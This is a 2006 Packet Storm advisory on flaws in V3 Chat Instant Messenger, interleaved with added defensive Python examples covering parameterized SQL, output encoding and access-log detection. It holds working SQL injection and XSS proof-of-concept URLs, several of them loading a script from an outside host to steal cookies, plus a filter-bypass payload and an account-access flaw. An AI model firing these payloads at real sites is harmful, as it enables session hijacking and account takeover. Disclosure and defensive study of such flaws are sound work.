v3chatIM.txt

2006-06-26T00:00:00
ID PACKETSTORM:47681
Type packetstorm
Reporter Luny
Modified 2006-06-26T00:00:00

Description

V3 Chat Instant Messenger  
  
http://www.v3chat.com/  
  
Affected files:  
  
/mail/index.php  
/mail/reply.php  
is_online.php  
online.php  
profile.php  
profileview.php  
search.php  
mycontacts.php  
expire.php  
  
* Editing your profile:  
  
- input boxes  
  
------------------------------------------  
  
Mail Vulnerabilities:  
  
Full path disclosure via SQL injection on id when reading mail:  
  
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17  
  
XSS vuln with cookie disclosure:  
  
We can bypass V3 Chat's filters by using malformed img tags around our script tags. PoC:  
  
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
Replying to mail XSS vulns:  
  
http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
---------------------------------------  
  
Members online XSS vulns with cookie disclosure:  
  
http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
  
Same as above, on online.php:  
  
http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
Adding members via online.php: MySQL error and full path disclosure:  
  
http://www.example.com/messenger/online.php?action=update&membername='  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1  
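The two MySQL errors above come from the same defect: the raw query-string value is pasted into the SQL text, and PHP's error display then prints the database message together with the script's filesystem path. The following is an added example, not V3 Chat's code, showing that pattern next to the fix: validate the type, bind the value with a placeholder, and keep the database error in the server log rather than the response. sqlite3 stands in for MySQL; the table, column and parameter names are assumptions.

```python
"""Added example, not V3 Chat's code: string-built SQL versus a validated,
parameterized query, plus a request handler that keeps the DB error (and the
script path) in the server log instead of the page. sqlite3 stands in for
MySQL; table, column and parameter names are assumptions."""
import logging
import sqlite3

log = logging.getLogger("v3chat-example")


def make_db():
    # Constructed sample data standing in for the mail table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE mail (mid INTEGER, id INTEGER, body TEXT)")
    con.execute("INSERT INTO mail VALUES (62, 1, 'hello')")
    return con


def read_mail_vulnerable(con, mid, id_):
    # The advisory's pattern: the raw query-string value lands inside the SQL
    # text, so id=1' breaks the statement and the DB reports a syntax error.
    sql = f"SELECT body FROM mail WHERE mid = {mid} AND id = {id_}"
    return con.execute(sql).fetchall()


def vulnerable_error_message(con, mid, id_):
    """Return the DB error text the vulnerable query produces, or None if it ran.
    With PHP's display_errors on, this text plus the script path is what the
    visitor sees, as in the advisory's warnings."""
    try:
        read_mail_vulnerable(con, mid, id_)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def read_mail_fixed(con, mid, id_):
    """Validate the type first, then bind the values with placeholders so the
    driver never treats them as SQL grammar. Returns None for a malformed id."""
    try:
        mid, id_ = int(mid), int(id_)
    except (TypeError, ValueError):
        return None
    sql = "SELECT body FROM mail WHERE mid = ? AND id = ?"
    return con.execute(sql, (mid, id_)).fetchall()


def handle_read_request(con, params):
    """Request handler: a malformed id is a 400; a DB failure is logged
    server-side and answered with a generic message (the PHP equivalent is
    display_errors=Off with log_errors=On), so no path reaches the client."""
    try:
        rows = read_mail_fixed(con, params.get("mid", ""), params.get("id", ""))
    except sqlite3.Error as exc:
        log.error("mail query failed: %s", exc)  # detail stays in the log
        return {"status": 500, "body": "Temporary error, please retry."}
    if rows is None:
        return {"status": 400, "body": "Bad request."}
    return {"status": 200, "body": rows}


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_error_message(db, "62", "1'"))  # the DB's syntax error text
    print(handle_read_request(db, {"mid": "62", "id": "1'"}))  # {'status': 400, 'body': 'Bad request.'}
    print(handle_read_request(db, {"mid": "62", "id": "1"}))  # {'status': 200, 'body': [('hello',)]}
```

The same shape applies to the online.php INSERT: the membername value is bound as a parameter, and the "You have an error in your SQL syntax" text goes to the error log, not the browser.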
  
-------------------------------------  
  
Search.php XSS vuln:  
  
http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
  
Adding a member from search.php XSS vuln:  
  
http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2=  
--------------------------------------  
  
Same as above, this time on profile.php:  
  
http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
-----------------------------------  
  
Same as above, on Profileview.php now:  
  
http://www.example.com/messenger/profileview.php?membername=demo<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
----------------------------------  
  
XSS vuln with cookie disclosure when editing profile:  
  
To bypass V3 Chat's filters we can use this XSS example (credits to RSnake): script tags wrapped around a document.write call that writes part of our second script tag.  
  
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>  
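Both bypasses in this advisory (the malformed IMG wrapper in the mail and member pages, and the split script tag here) work against a filter that looks for particular tag shapes in the input. The defensive answer is to encode reflected values for the context they land in at output time, so the question of what the filter recognises does not arise. Below is an added example, not V3 Chat's code: three template fragments (text node, quoted attribute, JavaScript string) fed the advisory's own PoC strings, with a helper that confirms only the template's tags survive. The fragment layouts, field names and the helper are assumptions.

```python
"""Added example, not V3 Chat's code: context-aware output encoding for the
reflected values the advisory lists (membername, site_id, login_id, profile
fields). Template fragments and helper names are assumptions; the inputs are
the advisory's PoC strings."""
import html
import json
import re
from urllib.parse import unquote

# Constructed inputs: the advisory's payloads, URL-decoded as the app sees them.
PAYLOADS = [
    unquote('<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">'),
    '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>',
    unquote('<IMG%20SRC=javascript:alert(document.cookie)>'),
]

TAG_RE = re.compile(r"<(/?[A-Za-z][A-Za-z0-9]*)")


def tags_in(fragment):
    """Names of every tag the fragment would open or close, in order. After
    correct encoding only the template's own tags should appear."""
    return TAG_RE.findall(fragment)


def render_text(value):
    # HTML text context: <, >, &, " and ' all become entities.
    return f"<p>Member: {html.escape(value, quote=True)}</p>"


def render_attr(value):
    # Quoted attribute context: the same escaping keeps the value inside the
    # quotes, which the IMG-wrapper payload relies on breaking out of.
    return f'<input type="hidden" name="site_id" value="{html.escape(value, quote=True)}">'


def render_js_string(value):
    # JavaScript string context: JSON-encode, then hide "<" so a "</script>"
    # inside the value cannot end the script block early (json.dumps alone
    # leaves "<" untouched).
    literal = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var member = {literal};</script>"


def encoded_safely(render, value):
    """True when rendering the value opens or closes only the template's tags."""
    template_tags = tags_in(render(""))
    return tags_in(render(value)) == template_tags


if __name__ == "__main__":
    for p in PAYLOADS:
        print(all(encoded_safely(r, p) for r in (render_text, render_attr, render_js_string)))  # True
```

In PHP the equivalent of render_text and render_attr is htmlspecialchars() with ENT_QUOTES on every reflected value; the JavaScript-string case needs json_encode() plus the same "<" substitution. Marking the session cookie HttpOnly also limits the cookie disclosure the advisory points at, though it does not remove the XSS itself.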
  
-------------------------------  
  
Mycontacts.php XSS vulns with user bypass.  
  
It seems that after you log in as a user you're able to put any username in membername= and it will take you to their buddy list. From there you can add, remove, chat with, etc., people on their buddy list.  
  
PoC:  
http://example.com/messenger/mycontacts.php?membername=putausername  
  
-------------------------------  
  
Expire.php XSS vuln:  
  
http://example.com/messenger/expire.php?cust_name=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
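Every GET-based PoC in this advisory leaves the payload in the web server's access log, which makes these issues easy to spot after the fact. The following is an added example, not part of the advisory: a small detector that URL-decodes each request's parameters and flags the markers the PoCs share (img/script tags, javascript: URIs, a quote in a value), run over constructed Apache-style log lines modelled on the advisory's URLs. The log regex, indicator names and sample lines are assumptions; real Apache logs backslash-escape embedded quotes, and the profile-edit payload arrives in a POST body the access log does not record.

```python
"""Added example, not part of the advisory: flag the request shapes the
advisory documents in Apache-style access log lines. Log format regex,
indicator names and sample lines are assumptions."""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Indicators drawn from the advisory's PoCs, checked on URL-decoded values.
INDICATORS = {
    "xss_tag": re.compile(r"<\s*/?\s*(script|img)\b", re.I),
    "xss_js_uri": re.compile(r"javascript\s*:", re.I),
    "sqli_quote": re.compile(r"'"),
}

# Constructed sample lines modelled on the advisory's URLs (quotes left
# unescaped for readability; the timestamp echoes the one in the advisory).
SAMPLE_LOG = [
    '''10.0.0.5 - - [17/Jun/2006:21:55:32 +0000] "GET /v3chat/mail/index.php?action=read&mid=62&id=1' HTTP/1.1" 200 512''',
    '''10.0.0.5 - - [17/Jun/2006:21:56:01 +0000] "GET /v3chat/members/is_online.php?membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> HTTP/1.1" 200 318''',
    '''10.0.0.7 - - [17/Jun/2006:22:03:14 +0000] "GET /messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1 HTTP/1.1" 200 2048''',
    '''10.0.0.9 - - [17/Jun/2006:22:04:40 +0000] "GET /messenger/profileview.php?membername=demo HTTP/1.1" 200 1744''',
]


def scan_line(line):
    """Return (client, script, param, indicator) tuples for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, _ts, _method, target, _status = m.groups()
    parts = urlsplit(target)
    findings = []
    # parse_qsl URL-decodes values, so %20 and friends cannot hide the markers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                findings.append((client, parts.path, name, label))
    return findings


def scan(lines):
    return [f for line in lines for f in scan_line(line)]


def by_script(findings):
    """Which scripts drew which indicator classes; a quick triage summary."""
    summary = {}
    for _client, script, _param, label in findings:
        summary.setdefault(script, set()).add(label)
    return summary


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print(by_script(scan(SAMPLE_LOG)))
```

The sqli_quote rule is deliberately blunt (a legitimate O'Brien trips it); in practice scope it to the parameters the application treats as numeric, such as id, mid and memberid here.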
  
-----------------------------  
  
Screenshots:  
http://www.youfucktard.com/xsp/v3chat1.jpg  
http://www.youfucktard.com/xsp/v3chat2.jpg  
http://www.youfucktard.com/xsp/v3chat3.jpg  
http://www.youfucktard.com/xsp/v3chat4.jpg  
http://www.youfucktard.com/xsp/v3chat5.jpg  
http://www.youfucktard.com/xsp/v3chat6.jpg  
http://www.youfucktard.com/xsp/v3chat7.jpg  
http://www.youfucktard.com/xsp/v3chat8.jpg  
http://www.youfucktard.com/xsp/v3chat9.jpg  
http://www.youfucktard.com/xsp/v3chat10.jpg  